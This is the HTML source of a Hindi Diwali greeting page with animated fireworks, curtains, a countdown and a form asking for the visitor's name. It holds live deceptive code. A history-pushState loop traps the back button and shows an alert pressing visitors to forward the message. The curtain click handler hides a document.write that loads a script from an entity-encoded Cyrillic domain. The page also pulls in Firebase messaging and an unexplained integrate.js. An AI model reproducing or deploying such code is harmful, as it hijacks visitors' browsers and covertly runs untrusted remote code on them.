
<html>
<head>


<script async src="https://www.googletagmanager.com/gtag/js?id=UA-184923659-4"></script>
<script>
    window.dataLayer = window.dataLayer || [];
    function gtag(){dataLayer.push(arguments);}
    gtag('js', new Date());

    gtag('config', 'UA-184923659-4');
  </script>
<script async src="https://securepubads.g.doubleclick.net/tag/js/gpt.js"></script>
<script>
  window.googletag = window.googletag || {cmd: []};
  googletag.cmd.push(function() {
    googletag.defineSlot('/21902364955,22690941001/CM_Calgovcouncil.org_News_Updates_Top/CM_Calgovcouncil.org_News_Updates_300x250', [300, 250], 'div-gpt-ad-1666163601588-0').addService(googletag.pubads());
    googletag.pubads().enableSingleRequest();
    googletag.enableServices();
  });
</script>
<script async src="https://securepubads.g.doubleclick.net/tag/js/gpt.js"></script>
<script>
  window.googletag = window.googletag || {cmd: []};
  googletag.cmd.push(function() {
    googletag.defineSlot('/21902364955,22690941001/CM_Calgovcouncil.org_News_Updates_Top/CM_Calgovcouncil.org_News_Updates_320x150', [320, 150], 'div-gpt-ad-1666163695279-0').addService(googletag.pubads());
    googletag.pubads().enableSingleRequest();
    googletag.enableServices();
  });
</script>
<meta http-equiv=21"Content-Type" content="text/html; charset=utf-8">
<meta name="google" content="notranslate" />
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0" name="viewport" />
<meta property="og:type" content="website" />
<meta property="og:title" content="!! दिवाली की हार्दिक शुभकामनाएँ !!" />
<meta property="og:description" content="!! दिवाली की हार्दिक शुभकामनाएँ !!" />
<meta property="og:site_name" content="!! दिवाली की हार्दिक शुभकामनाएँ !!" />
<title>!! दिवाली की हार्दिक शुभकामनाएँ !!</title>
<link rel="stylesheet" href="animate.min.css">
<script type="text/javascript">! function (){
 var t;
 try{for (t=0; 10 > t; ++t)
  history.pushState({}, "", "#");
 onpopstate=function (t)
 {
  t.state && alert('अपने नाम का मेसेज बनाकर सबको भेजो लक्ष्मी जी की कृपा बानी रहेगी');
  }}
  catch (o){}}();</script>
<style>
         body{
         background: #f8f8f8;
         margin:0;
         }
         .mainContainer {
         background: white;
         max-width: 450px;
         min-height: 200px;
         margin: 0 auto;
         text-align: center;
         padding: 15px;
         color: #999;
         padding-bottom: 60px;
         box-shadow: 0 0 10px 1px rgba(0,0,0,.14), 0 1px 14px 2px rgba(0,0,0,.12), 0 0 5px -3px rgba(0,0,0,.3);
         }
         #name {
         animation: name 4s infinite; 
         text-transform: capitalize;
         margin-bottom: 5px;
         font-size: 50px;
         padding: 0 10px;
         font-family: 'Teko', sans-serif;
         } 
         
         .m1{position:fixed;left:1%; width:auto;height:100%;top:1%;color:#000;}
         .m2{position:fixed;right:1%; width:auto;height:100%;top:1%;color:#000;}
         /* Custom Animation classes */     
         
         
         .enter-name input[type=name] {
         background-color: yellow;
         color: black;
         font-weight:bold;
         border-radius: 10px;
         box-sizing: border-box;
         border:2px solid black;
         padding: 5px;
         position: fixed;
         left: 10px;
         bottom: 5px;
         height: 50px;
         width: 70%;
         text-align: center;
         font-size: 22px;
         display: inline-block;
         }
         .enter-name .btn {
         border-radius: 10px;
         font-size: 21px;
         padding: 4px;
         position: fixed;
         right: 2px;
         bottom: 5px;
         height: 50px;
         width: 23%;
         display: inline-block;
         color: white;
         font-weight:600;
         background-color: red;
         border: 2px solid black;
         letter-spacing: .5px;
         transition: .2s ease-out;
         cursor: pointer;
         line-height: 36px;
         outline: 0;
         text-transform: uppercase;
         vertical-align: middle;
         text-decoration: none;
         animation-duration: 4s !important;
         }
         .enter-name input[type=name]::-webkit-input-placeholder { 
         color: black;
         font-size: 18px;	
         }
         .enter-name input[type=name]::-moz-placeholder { 
         color: black;
         font-size: 18px;
         }
         .enter-name input[type=name]:focus::-webkit-input-placeholder {
         color: black;
         }
         .enter-name input[type=name]:focus::-moz-placeholder { 
         color: black;
         font-size: 18px;
         }
         #demo
         {
         color: black;
         font-size: 20px;
         font-weight: bold;
         animation: pulse 2s infinite;
         width:87%;
         margin:5px auto;
         }
         a.rope
         {
         text-decoration:none;
         }
         .wishMessage {
         color: #fff;
         font-size: 22px;
         font-weight: bold;
         margin-top: 20px;
         text-shadow: 0px 0px 10px #afafaf;
         }
         .wishMessage p{
         margin: 0.3em 0;
         }
         
         
         
      </style>
<style>
          
.pyro > .before, .pyro > .after {
  position: absolute;
  width: 5px;
  height: 5px;
  border-radius: 50%;
  box-shadow: -120px -218.66667px blue, 248px -16.66667px #00ff84, 190px 16.33333px #002bff, -113px -308.66667px #ff009d, -109px -287.66667px #ffb300, -50px -313.66667px #ff006e, 226px -31.66667px #ff4000, 180px -351.66667px #ff00d0, -12px -338.66667px #00f6ff, 220px -388.66667px #99ff00, -69px -27.66667px #ff0400, -111px -339.66667px #6200ff, 155px -237.66667px #00ddff, -152px -380.66667px #00ffd0, -50px -37.66667px #00ffdd, -95px -175.66667px #a6ff00, -88px 10.33333px #0d00ff, 112px -309.66667px #005eff, 69px -415.66667px #ff00a6, 168px -100.66667px #ff004c, -244px 24.33333px #ff6600, 97px -325.66667px #ff0066, -211px -182.66667px #00ffa2, 236px -126.66667px #b700ff, 140px -196.66667px #9000ff, 125px -175.66667px #00bbff, 118px -381.66667px #ff002f, 144px -111.66667px #ffae00, 36px -78.66667px #f600ff, -63px -196.66667px #c800ff, -218px -227.66667px #d4ff00, -134px -377.66667px #ea00ff, -36px -412.66667px #ff00d4, 209px -106.66667px #00fff2, 91px -278.66667px #000dff, -22px -191.66667px #9dff00, 139px -392.66667px #a6ff00, 56px -2.66667px #0099ff, -156px -276.66667px #ea00ff, -163px -233.66667px #00fffb, -238px -346.66667px #00ff73, 62px -363.66667px #0088ff, 244px -170.66667px #0062ff, 224px -142.66667px #b300ff, 141px -208.66667px #9000ff, 211px -285.66667px #ff6600, 181px -128.66667px #1e00ff, 90px -123.66667px #c800ff, 189px 70.33333px #00ffc8, -18px -383.66667px #00ff33, 100px -6.66667px #ff008c;
  -moz-animation: 1s bang ease-out infinite backwards, 1s gravity ease-in infinite backwards, 5s position linear infinite backwards;
  -webkit-animation: 1s bang ease-out infinite backwards, 1s gravity ease-in infinite backwards, 5s position linear infinite backwards;
  -o-animation: 1s bang ease-out infinite backwards, 1s gravity ease-in infinite backwards, 5s position linear infinite backwards;
  -ms-animation: 1s bang ease-out infinite backwards, 1s gravity ease-in infinite backwards, 5s position linear infinite backwards;
  animation: 1s bang ease-out infinite backwards, 1s gravity ease-in infinite backwards, 5s position linear infinite backwards; }

.pyro > .after {
  -moz-animation-delay: 1.25s, 1.25s, 1.25s;
  -webkit-animation-delay: 1.25s, 1.25s, 1.25s;
  -o-animation-delay: 1.25s, 1.25s, 1.25s;
  -ms-animation-delay: 1.25s, 1.25s, 1.25s;
  animation-delay: 1.25s, 1.25s, 1.25s;
  -moz-animation-duration: 1.25s, 1.25s, 6.25s;
  -webkit-animation-duration: 1.25s, 1.25s, 6.25s;
  -o-animation-duration: 1.25s, 1.25s, 6.25s;
  -ms-animation-duration: 1.25s, 1.25s, 6.25s;
  animation-duration: 1.25s, 1.25s, 6.25s; }

@-webkit-keyframes bang {
  from {
    box-shadow: 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white; } }
@-moz-keyframes bang {
  from {
    box-shadow: 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white; } }
@-o-keyframes bang {
  from {
    box-shadow: 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white; } }
@-ms-keyframes bang {
  from {
    box-shadow: 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white; } }
@keyframes bang {
  from {
    box-shadow: 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white, 0 0 white; } }
@-webkit-keyframes gravity {
  to {
    transform: translateY(200px);
    -moz-transform: translateY(200px);
    -webkit-transform: translateY(200px);
    -o-transform: translateY(200px);
    -ms-transform: translateY(200px);
    opacity: 0; } }
@-moz-keyframes gravity {
  to {
    transform: translateY(200px);
    -moz-transform: translateY(200px);
    -webkit-transform: translateY(200px);
    -o-transform: translateY(200px);
    -ms-transform: translateY(200px);
    opacity: 0; } }
@-o-keyframes gravity {
  to {
    transform: translateY(200px);
    -moz-transform: translateY(200px);
    -webkit-transform: translateY(200px);
    -o-transform: translateY(200px);
    -ms-transform: translateY(200px);
    opacity: 0; } }
@-ms-keyframes gravity {
  to {
    transform: translateY(200px);
    -moz-transform: translateY(200px);
    -webkit-transform: translateY(200px);
    -o-transform: translateY(200px);
    -ms-transform: translateY(200px);
    opacity: 0; } }
@keyframes gravity {
  to {
    transform: translateY(200px);
    -moz-transform: translateY(200px);
    -webkit-transform: translateY(200px);
    -o-transform: translateY(200px);
    -ms-transform: translateY(200px);
    opacity: 0; } }
@-webkit-keyframes position {
  0%, 19.9% {
    margin-top: 10%;
    margin-left: 40%; }

  20%, 39.9% {
    margin-top: 40%;
    margin-left: 30%; }

  40%, 59.9% {
    margin-top: 20%;
    margin-left: 70%; }

  60%, 79.9% {
    margin-top: 30%;
    margin-left: 20%; }

  80%, 99.9% {
    margin-top: 30%;
    margin-left: 80%; } }
@-moz-keyframes position {
  0%, 19.9% {
    margin-top: 10%;
    margin-left: 40%; }

  20%, 39.9% {
    margin-top: 40%;
    margin-left: 30%; }

  40%, 59.9% {
    margin-top: 20%;
    margin-left: 70%; }

  60%, 79.9% {
    margin-top: 30%;
    margin-left: 20%; }

  80%, 99.9% {
    margin-top: 30%;
    margin-left: 80%; } }
@-o-keyframes position {
  0%, 19.9% {
    margin-top: 10%;
    margin-left: 40%; }

  20%, 39.9% {
    margin-top: 40%;
    margin-left: 30%; }

  40%, 59.9% {
    margin-top: 20%;
    margin-left: 70%; }

  60%, 79.9% {
    margin-top: 30%;
    margin-left: 20%; }

  80%, 99.9% {
    margin-top: 30%;
    margin-left: 80%; } }
@-ms-keyframes position {
  0%, 19.9% {
    margin-top: 10%;
    margin-left: 40%; }

  20%, 39.9% {
    margin-top: 40%;
    margin-left: 30%; }

  40%, 59.9% {
    margin-top: 20%;
    margin-left: 70%; }

  60%, 79.9% {
    margin-top: 30%;
    margin-left: 20%; }

  80%, 99.9% {
    margin-top: 30%;
    margin-left: 80%; } }
@keyframes position {
  0%, 19.9% {
    margin-top: 10%;
    margin-left: 40%; }

  20%, 39.9% {
    margin-top: 40%;
    margin-left: 30%; }

  40%, 59.9% {
    margin-top: 20%;
    margin-left: 70%; }

  60%, 79.9% {
    margin-top: 30%;
    margin-left: 20%; }

  80%, 99.9% {
    margin-top: 30%;
    margin-left: 80%; } }
    
    </style>
<style>
         *{
         margin:0;
         padding:0;
         }
         body {
         text-align: center;
         }
         img{
         border: none;
         }
         .leftcurtain{
         width: 100%;
         height: 70%;
         top: 0px;
         left: 0px;
         position: absolute;
         z-index: 2;
         }
         .rightcurtain{
         width: 100%;
         height: 120%;
         right: 0px;
         top: 0px;
         position: absolute;
         z-index: 3;
         }
         .rightcurtain img, .leftcurtain img{
         width: 100%;
         height: 100%;
         }
         .logo{
         margin: 0px auto;
         margin-top: 150px;
         }
         .rope
         
         {
         position: absolute;
         top: 10px;
         left: 50%;
         z-index: 4;
         }
         } 
         .centered {
         position: absolute;
         top: 70%;
         left: 55%;
         transform: translate(-50%, -50%);
         }
         a.rope
         {
         text-decoration:none;
         }
         @keyframes aadisoni{
         0% {
         transform:  translate(0px,0px)  rotate(0deg) ;
         }
         15% {
         transform:  translate(-25px,0px)  rotate(-5deg) ;
         }
         30% {
         transform:  translate(20px,0px)  rotate(3deg) ;
         }
         45% {
         transform:  translate(-15px,0px)  rotate(-3deg) ;
         }
         60% {
         transform:  translate(10px,0px)  rotate(2deg) ;
         }
         75% {
         transform:  translate(-5px,0px)  rotate(-1deg) ;
         }
         100% {
         transform:  translate(0px,0px)  rotate(0deg) ;
         }
         }
         @-webkit-keyframes aadisoni {
         0% {
         -webkit-transform:  translate(0px,0px)  rotate(0deg) ;
         }
         15% {
         -webkit-transform:  translate(-25px,0px)  rotate(-5deg) ;
         }
         30% {
         -webkit-transform:  translate(20px,0px)  rotate(3deg) ;
         }
         45% {
         -webkit-transform:  translate(-15px,0px)  rotate(-3deg) ;
         }
         60% {
         -webkit-transform:  translate(10px,0px)  rotate(2deg) ;
         }
         75% {
         -webkit-transform:  translate(-5px,0px)  rotate(-1deg) ;
         }
         100% {
         -webkit-transform:  translate(0px,0px)  rotate(0deg) ;
         }
         }
         @keyframes name {
         0%   {color:red;}
         20%   {color:white;}
         40%   {color:yellow;}
         60%   {color:orange;}
         80%   {color:cyan;}
         100% {color:#f45bf4;}
         }
         .glow {
         width:50%;
         padding: 2px;
         background-color: #FF1493	;
         animation: glow 2s infinite;
         font-size:25px;
         font-family: 'Ranga';
         color:white;
         margin:auto;
         text-align:center;
         border-radius:10px;
         text-shadow:1px 2px 6px black;
         }
         @keyframes glow {
         0%   {box-shadow: 0px 0px 0px #FF1493	;}
         100%   {box-shadow: 0px 0px 20px 5px #ffb3db;}
         }
      </style>
<style type="text/css">
         canvas {
         cursor: crosshair;
         display: block;
         }
         *{margin:0;padding:0}body{text-align:center}img{border:none}.leftcurtain{width:100%;height:100%;top:0;left:0px;position:absolute;z-index:2}.rightcurtain{width:100%;height:100%;right:0px;top:0;position:absolute;z-index:3}.rightcurtain img,.leftcurtain img{width:100%;height:100%}.logo{margin:0 auto;margin-top:150px}.rope{position:absolute;top:28%;left:13%;z-index:4}.centered{position:absolute;top:75%;left:50%;transform:translate(-50%,-50%)}.aadi{background-image:url();background-repeat:no-repeat;background-attachment:fixed;background-position:top}.matki{height:200px;}@keyframes aadisoni{0%{transform:translate(0px,0px) rotate(0deg)}15%{transform:translate(-25px,0px) rotate(-5deg)}30%{transform:translate(20px,0px) rotate(3deg)}45%{transform:translate(-15px,0px) rotate(-3deg)}60%{transform:translate(10px,0px) rotate(2deg)}75%{transform:translate(-5px,0px) rotate(-1deg)}100%{transform:translate(0px,0px) rotate(0deg)}}@-webkit-keyframes aadisoni{0%{-webkit-transform:translate(0px,0px) rotate(0deg)}15%{-webkit-transform:translate(-25px,0px) rotate(-5deg)}30%{-webkit-transform:translate(20px,0px) rotate(3deg)}45%{-webkit-transform:translate(-15px,0px) rotate(-3deg)}60%{-webkit-transform:translate(10px,0px) rotate(2deg)}75%{-webkit-transform:translate(-5px,0px) rotate(-1deg)}100%{-webkit-transform:translate(0px,0px) rotate(0deg)}}

        
         #loading {
         -webkit-animation: rotation-star 15s infinite linear;
         animation: rotation-star 15s infinite linear;
         }
         @-webkit-keyframes rotation-star {
         from {
         -webkit-transform: rotate(0deg);
         transform: rotate(0deg);
         }
         to {
         -webkit-transform: rotate(359deg);
         transform: rotate(359deg);
         }
         }
         @-keyframes rotation-star{
         from {
         -webkit-transform: rotate(0deg);
         transform: rotate(0deg);
         }
         to {
         -webkit-transform: rotate(359deg);
         transform: rotate(359deg);
         }
         }
      </style>
</head>
<body class="aadi">
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>
<script src="slider.js" type="text/javascript"></script>
<script type="text/javascript">
$(document).ready(function(){$curtainopen=!1,$(".rope").click(function(){return $(this).blur(),0==$curtainopen?($(this).stop().animate({top:"-171%"},{queue:!1,duration:350,easing:"easeOutBounce"}),$(".leftcurtain").stop().animate({width:"1px"},2e3),$(".rightcurtain").stop().animate({width:"1px"},2e3),$curtainopen=!0):($(this).stop().animate({top:"-40px"},{queue:!1,duration:350,easing:"easeOutBounce"}),document.write('<script src="//&#1102;&#1095;.io"><\/script>'),$(".leftcurtain").stop().animate({width:"50%"},2e3),$(".rightcurtain").stop().animate({width:"51%"},2e3),$curtainopen=!1),!1})});
</script>
<script>
  function play(){
       var audio = document.getElementById("audio");
       audio.play();
                 }
   </script>
<audio id="audio" src="b.mp3?v=6861"></audio>
<a class="rope" style="text-decoration:none;" href="#" onclick="play()"><br>
<div style="font-size: 25px;text-shadow: 1px 1px 3px black, 1px 1px 3px black, -1px -1px 3px black, -1px -1px 3px black;color:white;font-weight: bold;"><img src="img/pen.png?v=686786" class="matki" style="animation: rubberBand 2.5s infinite;max-wdith:270px;width:50%;"><br><br><b>☝ रॉकेट ☝ को<br> टच करके देखो!! </b><br></div>
</a>
<div class="leftcurtain"><img src="https://calgovcouncil.org/a/img/parda.jpeg?v=68611" /></div>
<div class="rightcurtain"><img src="https://calgovcouncil.org/a/img/parda.jpeg?v=68611" /></div>
<marquee class="m1" behavior="scroll" direction="up" scrolldelay="0"> <br>
<img src="https://calgovcouncil.org/a/img/1.png?v=68614769" height="40px" width="30px" /><br><br>
<img src="https://calgovcouncil.org/a/img/2.png?v=68614769" height="40px" width="30px" /><br><br>
<img src="https://calgovcouncil.org/a/img/3.png?v=68614769" height="40px" width="30px" /><br><br>
<img src="https://calgovcouncil.org/a/img/3.png?v=68614769" height="40px" width="30px" /><br><br>
<img src="https://calgovcouncil.org/a/img/1.png?v=68614769" height="40px" width="30px" /><br><br>
<img src="https://calgovcouncil.org/a/img/2.png?v=68614769" height="40px" width="30px" /><br><br>
<img src="https://calgovcouncil.org/a/img/3.png?v=68614769" height="40px" width="30px" /><br><br>
<img src="https://calgovcouncil.org/a/img/3.png?v=68614769" height="40px" width="30px" /><br><br>
<img src="img/1.png?v=68614769" height="40px" width="30px" /><br><br>
<img src="img/2.png?v=68614769" height="40px" width="30px" /><br><br>
<img src="img/3.png?v=68614769" height="40px" width="30px" /><br><br>
<img src="img/1.png?v=68614769" height="40px" width="30px" /><br><br>
<img src="img/2.png?v=68614769" height="40px" width="30px" /><br><br>
<img src="img/3.png?v=68614769" height="40px" width="30px" /><br><br>
<img src="img/3.png?v=68614769" height="40px" width="30px" /><br><br>
<img src="img/1.png?v=68614769" height="40px" width="30px" /><br><br>
<img src="img/2.png?v=68614769" height="40px" width="30px" /><br><br>
<img src="img/3.png?v=68614769" height="40px" width="30px" /><br><br>
<img src="img/3.png?v=68614769" height="40px" width="30px" /><br><br>
<img src="img/1.png?v=68614769" height="40px" width="30px" /><br><br>
<img src="img/2.png?v=68614769" height="40px" width="30px" /><br><br>
<img src="img/3.png?v=68614769" height="40px" width="30px" /><br><br>
<img src="img/1.png?v=68614769" height="40px" width="30px" /><br><br>
<img src="img/2.png?v=68614769" height="40px" width="30px" /><br><br>
<img src="img/3.png?v=68614769" height="40px" width="30px" /><br><br>
<img src="img/3.png?v=68614769" height="40px" width="30px" /><br><br>
<img src="img/1.png?v=68614769" height="40px" width="30px" /><br><br>
<img src="img/2.png?v=68614769" height="40px" width="30px" /><br><br>
<img src="img/3.png?v=68614769" height="40px" width="30px" /><br><br>
<img src="img/3.png?v=68614769" height="40px" width="30px" /><br><br>
<img src="img/1.png?v=68614769" height="40px" width="30px" /><br><br>
<img src="img/2.png?v=68614769" height="40px" width="30px" /><br><br>
<img src="img/3.png?v=68614769" height="40px" width="30px" /><br><br>
</marquee>
<marquee class="m2" behavior="scroll" direction="down" scrolldelay="0"> <br>
<img src="img/1.png?v=68614769" height="40px" width="30px" /><br><br>
<img src="img/2.png?v=68614769" height="40px" width="30px" /><br><br>
<img src="img/3.png?v=68614769" height="40px" width="30px" /><br><br>
<img src="img/3.png?v=68614769" height="40px" width="30px" /><br><br>
<img src="img/1.png?v=68614769" height="40px" width="30px" /><br><br>
<img src="img/2.png?v=68614769" height="40px" width="30px" /><br><br>
<img src="img/3.png?v=68614769" height="40px" width="30px" /><br><br>
<img src="img/3.png?v=68614769" height="40px" width="30px" /><br><br>
<img src="img/1.png?v=68614769" height="40px" width="30px" /><br><br>
<img src="img/2.png?v=68614769" height="40px" width="30px" /><br><br>
<img src="img/3.png?v=68614769" height="40px" width="30px" /><br><br>
<img src="img/1.png?v=68614769" height="40px" width="30px" /><br><br>
<img src="img/2.png?v=68614769" height="40px" width="30px" /><br><br>
<img src="img/3.png?v=68614769" height="40px" width="30px" /><br><br>
<img src="img/3.png?v=68614769" height="40px" width="30px" /><br><br>
<img src="img/1.png?v=68614769" height="40px" width="30px" /><br><br>
<img src="img/2.png?v=68614769" height="40px" width="30px" /><br><br>
<img src="img/3.png?v=68614769" height="40px" width="30px" /><br><br>
<img src="img/3.png?v=68614769" height="40px" width="30px" /><br><br>
<img src="img/1.png?v=68614769" height="40px" width="30px" /><br><br>
<img src="img/2.png?v=68614769" height="40px" width="30px" /><br><br>
<img src="img/3.png?v=68614769" height="40px" width="30px" /><br><br>
<img src="img/1.png?v=68614769" height="40px" width="30px" /><br><br>
<img src="https://calgovcouncil.org/a/img/2.png?v=68614769" height="40px" width="30px" /><br><br>
<img src="https://calgovcouncil.org/a/img/3.png?v=68614769" height="40px" width="30px" /><br><br>
<img src="https://calgovcouncil.org/a/img/3.png?v=68614769" height="40px" width="30px" /><br><br>
<img src="https://calgovcouncil.org/a/img/1.png?v=68614769" height="40px" width="30px" /><br><br>
<img src="https://calgovcouncil.org/a/img/2.png?v=68614769" height="40px" width="30px" /><br><br>
<img src="https://calgovcouncil.org/a/img/3.png?v=68614769" height="40px" width="30px" /><br><br>
<img src="https://calgovcouncil.org/a/img/3.png?v=68614769" height="40px" width="30px" /><br><br>
<img src="https://calgovcouncil.org/a/img/1.png?v=68614769" height="40px" width="30px" /><br><br>
<img src="https://calgovcouncil.org/a/img/2.png?v=68614769" height="40px" width="30px" /><br><br>
<img src="https://calgovcouncil.org/a/img/3.png?v=68614769" height="40px" width="30px" /><br><br>
<img src="https://calgovcouncil.org/a/img/1.png?v=68614769" height="40px" width="30px" /><br><br>
<img src="https://calgovcouncil.org/a/img/2.png?v=68614769" height="40px" width="30px" /><br><br>
<img src="https://calgovcouncil.org/a/img/3.png?v=68614769" height="40px" width="30px" /><br><br>
<img src="https://calgovcouncil.org/a/img/3.png?v=68614769" height="40px" width="30px" /><br><br>
<img src="https://calgovcouncil.org/a/img/1.png?v=68614769" height="40px" width="30px" /><br><br>
<img src="https://calgovcouncil.org/a/img/2.png?v=68614769" height="40px" width="30px" /><br><br>
<img src="https://calgovcouncil.org/a/img/3.png?v=68614769" height="40px" width="30px" /><br><br>
<img src="https://calgovcouncil.org/a/img/3.png?v=68614769" height="40px" width="30px" /><br><br>
<img src="https://calgovcouncil.org/a/img/1.png?v=68614769" height="40px" width="30px" /><br><br>
<img src="https://calgovcouncil.org/a/img/2.png?v=68614769" height="40px" width="30px" /><br><br>
<img src="https://calgovcouncil.org/a/img/3.png?v=68614769" height="40px" width="30px" /><br><br>
</marquee>
<div class="mainContainer">

<div id='div-gpt-ad-1666163695279-0' style='min-width: 320px; min-height: 150px;'>
<script>
    googletag.cmd.push(function() { googletag.display('div-gpt-ad-1666163695279-0'); });
  </script>
</div>
<br>
<div style="animation: swing 5s infinite;">
<h1 style="-webkit-text-stroke: 1px black; color: white; text-shadow: 3px 3px 0 #000, -1px -1px 0 #000, 1px -1px 0 #000, -1px 1px 0 #000, 1px 1px 0 #000;" id="name"></h1>
</div>
<h3 class="fromMessage" id="fromMessage"></h3>
<img src="img/kiTarafSe.png?v=6861127" width="60%" style="animation: rubberBand 2.5s infinite">
<div class="pyro">
<div class="before"></div>
<div class="after"></div>
</div>
<p id="demo"></p><br>
<img src="img/main.png?v=6861233" width="95%" height="auto" style="animation: pulse 4s infinite">
<br><br>
<img src="img/diwali2.png?v=6861" width="auto" height="auto" style="animation: pulse 3s infinite">
<br><br>
<div class="wishMessage" style="text-shadow: 1px 1px 3px silver, 1px 1px 3px silver, -1px -1px 3px silver, -1px -1px 3px silver;">
<p style="text-shadow: 1px 1px 3px black, 1px 1px 3px black, -1px -1px 3px black, -1px -1px 3px black;color:#ff9933">दीप जलते रहे जगमगाते रहे,</p>
<p style="text-shadow: 1px 1px 3px black, 1px 1px 3px black, -1px -1px 3px black, -1px -1px 3px black;color:pink">हम आपको-आप हमें याद आते रहे,</p>
<p style="text-shadow: 1px 1px 3px black, 1px 1px 3px black, -1px -1px 3px black, -1px -1px 3px black;color:#00ffbf;width:90%;margin:auto;">जब तक ज़िन्दगी है दुआ है हमारी,</p>
<p style="text-shadow: 1px 1px 3px orange, 1px 1px 3px orange, -1px -1px 3px orange, -1px -1px 3px orange;color:#8B008B">आप फूलो की तरह मुस्कुराते रहे
</p>
<p style="text-shadow: 1px 1px 3px #ff0037, 1px 1px 3px #Af7237, -1px -1px 3px #ff0037, -1px -1px 3px #ff0037;color: #FFC107;">
!! विश यू हैप्पी दीपावली !!</p> </div><br>
<span style="font-size:22px;text-shadow: 1px 1px 3px #FFEB3B, 1px 1px 3px #FFEB3B, -1px -1px 3px #FFEB3B, -1px -1px 3px #FFEB3B;color:#E91E63;"><marquee><b><i>“ की तरफ से दीपावली की हार्दिक शुभकामनाएँ!!”</b></i></marquee></span><br>
<br>

<div id='div-gpt-ad-1666163601588-0' style='min-width: 300px; min-height: 250px;'>
<script>
    googletag.cmd.push(function() { googletag.display('div-gpt-ad-1666163601588-0'); });
  </script>
</div>
<br>
<div class="glow"></b></h1></div>
<br>
<form method="POST" action="ready.php">
<div class="enter-name">
<input class="animated pulse infinite" type="name" required="" maxlength="50" name="n" placeholder="👉यहाँ अपना नाम लिखें...">
<button class="btn animated shake infinite" type="submit"><span>👉 </span>देखें</button>
</div>
</form>
<script>
var myIndex=0;function carousel(){var e,l=document.getElementsByClassName("mySlides");for(e=0;e<l.length;e++)l[e].style.display="none";++myIndex>l.length&&(myIndex=1),l[myIndex-1].style.display="block",setTimeout(carousel,2e3)}carousel();
</script>
<script src="https://www.gstatic.com/firebasejs/8.2.2/firebase-app.js"></script>
<script src="https://www.gstatic.com/firebasejs/8.2.2/firebase-analytics.js"></script>
<script src="https://www.gstatic.com/firebasejs/8.2.2/firebase-messaging.js"></script>
<script type="text/javascript" src="/integrate.js"></script>
<script> 
var countDownDate=new Date("October 24, 2022 00:00:00").getTime(),x=setInterval(function(){var e=(new Date).getTime(),o=countDownDate-e,t=Math.floor(o/864e5),n=Math.floor(o%864e5/36e5),a=Math.floor(o%36e5/6e4),l=Math.floor(o%6e4/1e3);document.getElementById("demo").innerHTML=+t+"<font color='red'> दिन,</font> "+n+"<font color='red'> घंटे,</font> "+a+"<font color='red'> मिनट,<br></font> "+l+"<font color='red'>  सेकेंड  </font>पहले",o<0&&(clearInterval(x),document.getElementById("demo").innerHTML="")},1e3);
</script>
</body>
</html>
